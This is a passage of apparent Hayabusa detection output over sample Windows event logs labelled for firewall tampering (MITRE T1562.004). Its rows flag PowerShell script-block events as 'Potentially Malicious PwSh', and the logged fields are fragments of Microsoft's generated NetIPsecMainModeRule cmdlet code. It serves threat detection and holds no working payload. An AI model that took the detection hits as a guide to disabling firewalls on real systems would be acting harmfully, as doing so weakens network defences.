[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletiza",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 